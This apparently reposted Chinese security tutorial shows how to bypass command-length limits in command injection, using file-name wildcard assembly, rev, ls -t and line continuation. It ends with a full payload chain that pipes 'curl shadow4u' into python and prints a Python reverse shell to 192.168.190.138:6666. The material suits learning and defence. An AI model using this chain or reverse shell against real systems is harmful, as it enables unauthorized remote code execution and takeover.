2. 程式人生 > 其它 >挖洞經驗 | 命令注入突破長度限制

挖洞經驗 | 命令注入突破長度限制

阿新 發佈:2022-04-28

0x01 背景

很多時候,在我們歷經千辛萬苦挖掘出一個漏洞或者找到一個利用點的時候,卻因為一些egg hurt的限制,導致get shell或者send payload無法成功,其實很多高手都是有一些trick的,但是往往一串包含各種trick的高深payload甩得你不知所云

最近遇到這樣一個問題。命令長度限制在5,如何完成注入get shell?

Array什麼的都嘗試無果,在學習了各種大牛的trick後,才恍然大悟,希望給初學者提供一些新的思路,集思廣益。

0x02 命令組裝

首先是命令組裝,先來看一個例子,準備工作 mkdir cmd;cd cmd;

分別輸入>echo >hello

,可以看到分別建立了兩個檔案echo和 hello,然後執行*,結果輸出了hello

很多人一定已經明白

此時等於 echo hello,我們可以通過**_echo _ 來檢視*到底是啥

這樣,我們通過>echo >hello 完成命令組裝,然後* 組成並執行了命令echo hello

同樣的道理

不過這次讓我們把命令長度限制到4

那麼如果我們要執行命令ls -l怎麼辦

我們模仿上面做法,輸入>ls>-l產生了兩個檔案 ls -l

這有個問題,我們剛才生成的echo和hello,e 的順序正好在h之前,所以ok。但是此時檔案的顯示順序-l在 ls前面,如果我們執行 其實是執行_*-l ls

_,會出現錯誤

那麼如何獲得ls -l呢,先是第一種思路

0x03 反轉命令

我們把這個命令字元序列反過來看 l- sl

這樣是不是順序正好滿足要求,接下來我們只需要用一個可以把字元反過來的命令,就可以完成這個功能

這樣,我們先生成l-和sl兩個命令

然後將l- sl組合寫入檔案v(為什麼檔名要用v ,下面會解釋,是個trick),最後用一個命令將檔案中的位元組反轉

如果我們直接使用ls>v

可以看到檔案v中多了一個v,對我們命令造成干擾

我們只想檔案中存在l-和sl

_trick1 _

這裡有個技巧

dir a b>c只會將a b寫到檔案c中

我們建立一個名為dir的檔案,然後執行*>v

,可以獲得l- 和ls

接下來就是反序

trick2

有一個rev命令,正好可以將內容反序,我們產生一個名為rev的檔案,然後執行*v ,此時命令相當於rev v(這裡就是上面為啥檔案命名為v,為了被萬用字元匹配),這樣就產生了我們要的輸出ls -l

然後就是輸出到檔案x,然後就可以執行sh x,成功以4 個字元執行長度為5的ls -l命令

整個命令鏈(長度<=4)

完成ls -l

0x04 控制順序

理解上述命令之後

假設我們要生成ls -t >g

逆序是g< t- sl,按照字母順序 t- 會在 sl 後面,不滿足需要。所以我們變通一下,生成命令ls -th >g,逆序就是g> ht- sl,正好滿足順序要求,然後依葫蘆畫瓢

   _trick3_

上面說到檔名排列的時候有預設順序,怎麼自由控制順序呢

其實ls -t 也就是根據mtime排序,新的在前面

而-h對順序本身沒什麼影響,可以方便構造payload

比如我們要生成ls -l,可以通過ls -t打破預設順序

0x05 命令續行

通過前面的一連串命令,我們已經得到ls -th >g

trick4

然後還有一點,linux的命令續行,比如ls分成兩行,都是ok

這樣,我們就可以構造一連串的拼接命令續航。比如,我要構造命令curl shadow4u|python;

py這裡看著是5個字元,超過了4個的限制,實際上是因為 shell環境需要輸入產生,但是php 程式碼exec時,只需要輸入即可產生,比如 exec(“>py”)即可。所以這裡實際上是不超過4個字元的,為了演示直觀,在shell中直接執行。

執行ls -th>g

然後sh g,實際執行反彈shell命令

curl shadow4u獲得的內容

importsocket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.190.138",6666));
os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);

0x06 payload鏈

所以,完整payload鏈為

生成包含ls -th >g檔案x

然後生成curl shadow4u|python命令續行檔案

然後執行sh x把curl shadow4u|python命令寫入檔案g

然後執行sh g,getshell

0x07 總結

4個trick思路加上重定向和反彈shell知識

trick1 命令組裝 dir a b >c trick2 萬用字元的妙用 *v=rev v trick3 按時間順序排列檔案 ls -t trick4 命令續行

相關推薦

經驗 | 命令注入突破長度限制

0x01 背景 很多時候,在我們歷經千辛萬苦挖掘出一個漏洞或者找到一個利用點的時候,卻因為一些egg hurt的限制,導致get shell或者send payload無法成功,其實很多高手都是有一些trick的,但是往往一串包含各種trick的

經驗 | 看我如何發現“小火車托馬斯”智慧玩具APP聊天應用漏洞

最近,我向智慧玩具廠商ToyTalk提交了兩個APP相關的漏洞並獲得了$1750美金獎勵,目前,漏洞已被成功修復,在此我打算公開詳細的漏洞發現過程,以便其他APP開發人員將這種脆弱性威脅納入開發過程的安全性考慮範圍。

經驗|雅虎小企業服務平臺Luminate身份認證漏洞

對內容管理系統的開發來說,一個重要和關鍵的步驟就是賬戶的身份認證實現。身份認證功能可以管理使用者登入行為和會話,作出有效的登入訪問控制。通常,這種認證功能一般由使用者名稱和密碼來實現,但在實際應用場景

經驗 | 看我如何通過子域名接管繞過Uber單點登入認證機制

Uber使用Amazon CloudFront CDN架構的網站saostatic.uber.com存在子域名安全漏洞,可被攻擊者接管。另外,Uber近期部署在網站auth.uber.com上,基於Uber所有子域名cookie共享實現認證的單點登入系統(SSO)也存在安全

經驗 | 看我如何綜合利用4個漏洞實現GitHub Enterprise 遠端程式碼執行

大家好,距離上次漏洞披露已有半年之餘,在這篇文章中,我將向大家展示如何通過4個漏洞完美實現GitHub Enterprise的RCE執行,該RCE實現方法與伺服器端請求偽造技術(SSRF)相關,技術稍顯過時但綜合利用威力強大。最

經驗 | 記一次曲折的Getshell過程

最近在某框架的漏洞,其中到一枚Getshell,的過程有點曲折感覺可以寫篇文章總結一下,方便與各位大牛交流交流。

經驗 | 記一次針對Twitter(Periscope)API 的有趣經歷

近期,我在Twitter的Periscope服務中發現了一個漏洞。這是一個CSRF(跨站請求偽造)漏洞,雖然這個漏洞並不算是高危漏洞,但是發現該漏洞的整個過程我認為是非常值得跟大家分享的。

經驗 | 看我如何利用SAML漏洞實現Uber內部聊天系統未授權登入

本文講述了利用SAML(安全宣告標記語言)服務漏洞,繞過優步(Uber)公司內部聊天系統身份認證機制,實現了對該內部聊天系統的未授權登入訪問,該漏洞最終獲得Uber官方8500美元獎勵。

我說我精通字串,面試官竟然問我Java中的String有沒有長度限制!?

String是Java中很重要的一個資料型別,除了基本資料型別以外,String是被使用的最廣泛的了,但是,關於String,其實還是有很多東西容易被忽略的。

MySQL索引長度限制原理解析

這篇文章主要介紹了MySQL索引長度限制原理解析,文中通過示例程式碼介紹的非常詳細,對大家的學習或者工作具有一定的參考學習價值,需要的朋友可以參考下

如何修改Mysql中group_concat的長度限制

在mysql中,有個函式叫“group_concat”,平常使用可能發現不了問題,在處理大資料的時候,會發現內容被截取了,其實MYSQL內部對這個是有設定的,預設不設定的長度是1024,如果我們需要更大,就需要手工去修改

DVWA靶場——Command Injection(命令注入)

概述 Command Injection,即命令注入,是指通過提交惡意構造的引數破壞命令語句結構,從而達到執行惡意命令的目的。PHP命令注入攻擊漏洞是PHP應用程式中常見的指令碼漏洞之一,國內著名的Web應用程式Discuz!、DedeCM

4-8 命令注入命令執行)

4-8 命令注入命令執行) 命令注入,又稱命令執行漏洞。(RCE,remote command execute)

墨者學院—命令注入執行分析—兩種解法

一.解題思路 利用管道符構造命令 二.操作步驟 解法一 1.測試127.0.0.1能否返回正常資料

攻防世界-web-love_math(base_convert進位制轉換繞過白名單和長度限制

題目來源:CISCN題目描述:解密 進入介面 <?php error_reporting(0); //聽說你很喜歡數學,不知道你是否愛它勝過愛flag

DVWA全級別通關筆記(二)-- Command Injection(命令注入

引言 結合DVWA提供的命令注入模組,對命令注入漏洞進行學習總結。命令注入(Command Injection)是指通過提交惡意構造的引數破壞命令語句結構,從而達到執行惡意命令的目的。

Pinpoint 更改agentid 和 agent name 長度限制(Pinpoint系列二)

本文基於 Pinpoint 2.1.0 版本 本文的內容為了更改 ID 和 Name 長度限制,因為有使用容器或者是服務名稱確實比較長,所以根據業務場景,我們需要更改原始碼來實現這個。

DVWA各等級命令注入漏洞

漏洞描述 在web程式中,因為業務功能需求要通過web前端傳遞引數到後臺伺服器上執行,由於開發人員沒有對輸入進行嚴格過濾,導致攻擊者可以構造一些額外的\"帶有非法目的的\"命令,欺騙後臺伺服器

lotus礦常用命令

技術標籤:Filecoin區塊鏈Filecoinlotus lotus 常用命令 lotus啟動停止lotus匯出鏈資料快照壓縮鏈資料以減少磁碟佔用修改礦工地址(owner、worker、control)從礦工賬戶轉FIL到owner地址管理錢包連線其他lotus

CVE-2020-15778 OpenSSH命令注入漏洞復現

技術標籤:滲透測試 CVE-2020-15778 OpenSSH命令注入漏洞復現 漏洞描述 OpenSSH是用於使用SSH協議進行遠端登入的一個開源實現。通過對互動的流量進行加密防止竊聽,連線劫持以及其他攻擊。OpenSSH由OpenBSD專案的